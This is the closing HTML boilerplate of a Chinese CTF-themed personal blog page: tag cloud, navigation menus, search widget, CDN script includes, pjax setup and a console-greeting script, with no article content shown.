0.88rem;">Web-Middleware<sup>1</sup></a><a href="/tags/Web-SQL/" style="font-size: 0.88rem;">Web-SQL<sup>4</sup></a><a href="/tags/%E5%BC%80%E5%8F%91/" style="font-size: 0.88rem;">开发<sup>5</sup></a></div></div><hr/></div></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="anzhiyufont anzhiyu-icon-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="anzhiyufont anzhiyu-icon-circle-half-stroke"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="anzhiyufont anzhiyu-icon-arrows-left-right"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="anzhiyufont anzhiyu-icon-gear"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="anzhiyufont anzhiyu-icon-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="anzhiyufont anzhiyu-icon-arrow-up"></i></button></div></div><div id="algolia-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><button class="search-close-button"><i class="anzhiyufont anzhiyu-icon-xmark"></i></button></nav><div class="search-wrap"><div id="algolia-search-input"></div><hr/><div id="algolia-search-results"><div id="algolia-hits"><a class="tag-list" href="/tags/CTF-Web" title="CTF-Web">CTF-Web</a></div><div id="algolia-pagination"></div><div id="algolia-info"><div class="algolia-stats"></div><div class="algolia-poweredBy"></div></div></div></div></div><div id="search-mask"></div></div><div id="rightMenu"><div class="rightMenu-group rightMenu-small"><div class="rightMenu-item" id="menu-backward"><i class="anzhiyufont anzhiyu-icon-arrow-left"></i></div><div class="rightMenu-item" id="menu-forward"><i class="anzhiyufont anzhiyu-icon-arrow-right"></i></div><div class="rightMenu-item" id="menu-refresh"><i class="anzhiyufont anzhiyu-icon-arrow-rotate-right" style="font-size: 1rem;"></i></div><div class="rightMenu-item" id="menu-top"><i class="anzhiyufont anzhiyu-icon-arrow-up"></i></div></div><div class="rightMenu-group rightMenu-line rightMenuPlugin"><div class="rightMenu-item" id="menu-copytext"><i class="anzhiyufont anzhiyu-icon-copy"></i><span>复制选中文本</span></div><div class="rightMenu-item" id="menu-pastetext"><i class="anzhiyufont anzhiyu-icon-paste"></i><span>粘贴文本</span></div><a class="rightMenu-item" id="menu-commenttext"><i class="anzhiyufont anzhiyu-icon-comment-medical"></i><span>引用到评论</span></a><div class="rightMenu-item" id="menu-newwindow"><i class="anzhiyufont anzhiyu-icon-window-restore"></i><span>新窗口打开</span></div><div class="rightMenu-item" id="menu-copylink"><i class="anzhiyufont anzhiyu-icon-link"></i><span>复制链接地址</span></div><div class="rightMenu-item" id="menu-copyimg"><i class="anzhiyufont anzhiyu-icon-images"></i><span>复制此图片</span></div><div class="rightMenu-item" id="menu-downloadimg"><i class="anzhiyufont anzhiyu-icon-download"></i><span>下载此图片</span></div><div class="rightMenu-item" id="menu-newwindowimg"><i class="anzhiyufont anzhiyu-icon-window-restore"></i><span>新窗口打开图片</span></div><div class="rightMenu-item" id="menu-search"><i class="anzhiyufont anzhiyu-icon-magnifying-glass"></i><span>站内搜索</span></div><div class="rightMenu-item" id="menu-searchBaidu"><i class="anzhiyufont anzhiyu-icon-magnifying-glass"></i><span>百度搜索</span></div><div class="rightMenu-item" id="menu-music-toggle"><i class="anzhiyufont anzhiyu-icon-play"></i><span>播放音乐</span></div><div class="rightMenu-item" id="menu-music-back"><i class="anzhiyufont anzhiyu-icon-backward"></i><span>切换到上一首</span></div><div class="rightMenu-item" id="menu-music-forward"><i class="anzhiyufont anzhiyu-icon-forward"></i><span>切换到下一首</span></div><div class="rightMenu-item" id="menu-music-playlist" onclick="window.open(&quot;https://y.qq.com/n/ryqq/playlist/8802438608&quot;, &quot;_blank&quot;);" style="display: none;"><i class="anzhiyufont anzhiyu-icon-radio"></i><span>查看所有歌曲</span></div><div class="rightMenu-item" id="menu-music-copyMusicName"><i class="anzhiyufont anzhiyu-icon-copy"></i><span>复制歌名</span></div></div><div class="rightMenu-group rightMenu-line rightMenuOther"><a class="rightMenu-item menu-link" id="menu-randomPost"><i class="anzhiyufont anzhiyu-icon-shuffle"></i><span>随便逛逛</span></a><a class="rightMenu-item menu-link" href="/categories/"><i class="anzhiyufont anzhiyu-icon-cube"></i><span>博客分类</span></a><a class="rightMenu-item menu-link" href="/tags/"><i class="anzhiyufont anzhiyu-icon-tags"></i><span>文章标签</span></a></div><div class="rightMenu-group rightMenu-line rightMenuOther"><a class="rightMenu-item" id="menu-copy" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-copy"></i><span>复制地址</span></a><a class="rightMenu-item" id="menu-commentBarrage" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-message"></i><span class="menu-commentBarrage-text">关闭热评</span></a><a class="rightMenu-item" id="menu-darkmode" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-circle-half-stroke"></i><span class="menu-darkmode-text">深色模式</span></a><a class="rightMenu-item" id="menu-translate" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-language"></i><span>轉為繁體</span></a></div></div><div id="rightmenu-mask"></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.cbd.int/@fancyapps/ui@5.0.28/dist/fancybox/fancybox.umd.js"></script><script src="https://cdn.cbd.int/instant.page@5.2.0/instantpage.js" type="module"></script><script src="https://cdn.cbd.int/vanilla-lazyload@17.8.5/dist/lazyload.iife.min.js"></script><script src="https://cdn.cbd.int/node-snackbar@0.1.16/dist/snackbar.min.js"></script><canvas id="universe"></canvas><script async src="/js/dark.js"></script><script>// 消除控制台打印
var HoldLog = console.log;
console.log = function () {};
let now1 = new Date();
queueMicrotask(() => {
  const Log = function () {
    HoldLog.apply(console, arguments);
  }; //在恢复前输出日志
  const grt = new Date("2023/9/19 12:50:02"); //此处修改你的建站时间或者网站上线时间
  now1.setTime(now1.getTime() + 250);
  const days = (now1 - grt) / 1000 / 60 / 60 / 24;
  const dnum = Math.floor(days);

  setTimeout(Log.bind(console, "%c WELCOME %c 你好，CTFer.", "color:white; background-color:#4f90d9", ""));

  setTimeout(
    console.warn.bind(
      console,
      "%c ⚡ Powered by 安知鱼 %c 你正在访问 Wells 的博客.",
      "color:white; background-color:#f0ad4e",
      ""
    )
  );

  setTimeout(Log.bind(console, "%c W23-12 %c 你已打开控制台.", "color:white; background-color:#4f90d9", ""));

  setTimeout(
    console.warn.bind(console, "%c S013-782 %c 你现在正处于监控中.", "color:white; background-color:#d9534f", "")
  );
});</script><script async src="/anzhiyu/random.js"></script><script src="https://cdn.cbd.int/algoliasearch@4.18.0/dist/algoliasearch-lite.umd.js"></script><script src="https://cdn.cbd.int/instantsearch.js@4.60.0/dist/instantsearch.production.min.js"></script><script src="/js/search/algolia.js"></script><div class="js-pjax"><input type="hidden" name="page-type" id="page-type" value="post"></div><script async data-pjax src="https://cdn.cbd.int/anzhiyu-theme-static@1.0.0/waterfall/waterfall.js"></script><script src="/js/qrcode.min.js"></script><link rel="stylesheet" href="https://cdn.cbd.int/anzhiyu-theme-static@1.1.9/icon/ali_iconfont_css.css"><link rel="stylesheet" href="https://cdn.cbd.int/anzhiyu-theme-static@1.0.0/aplayer/APlayer.min.css" media="print" onload="this.media='all'"><script src="https://cdn.cbd.int/anzhiyu-blog-static@1.0.1/js/APlayer.min.js"></script><script src="https://cdn.cbd.int/hexo-anzhiyu-music@1.0.1/assets/js/Meting2.min.js"></script><script src="https://cdn.cbd.int/pjax@0.2.8/pjax.min.js"></script><script>let pjaxSelectors = ["head > title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show",".js-pjax"]
var pjax = new Pjax({
  elements: 'a:not([target="_blank"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:send', function () {
  // removeEventListener scroll 
  anzhiyu.removeGlobalFnEvent('pjax')
  anzhiyu.removeGlobalFnEvent('themeChange')

  document.getElementById('rightside').classList.remove('rightside-show')
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  //reset readmode
  const $bodyClassList = document.body.classList
  $bodyClassList.contains('read-mode') && $bodyClassList.remove('read-mode')
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()

  document.querySelectorAll('script[data-pjax]').forEach(item => {
    const newScript = document.createElement('script')
    const content = item.text || item.textContent || item.innerHTML || ""
    Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
    newScript.appendChild(document.createTextNode(content))
    item.parentNode.replaceChild(newScript, item)
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof panguInit === 'function' && panguInit()

  // google analytics
  typeof gtag === 'function' && gtag('config', '', {'page_path': window.location.pathname});

  // baidu analytics
  typeof _hmt === 'object' && _hmt.push(['_trackPageview',window.location.pathname]);

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()
})

document.addEventListener('pjax:error', e => {
  if (e.request.status === 404) {
    pjax.loadUrl('/404.html')
  }
})</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><div id="popup-window"><div class="popup-window-title">通知</div><div class="popup-window-divider"></div><div class="popup-window-content"><div class="popup-tip">你好呀</div><div class="popup-link"><i class="anzhiyufont anzhiyu-icon-arrow-circle-right"></i></div></div></div></body></html>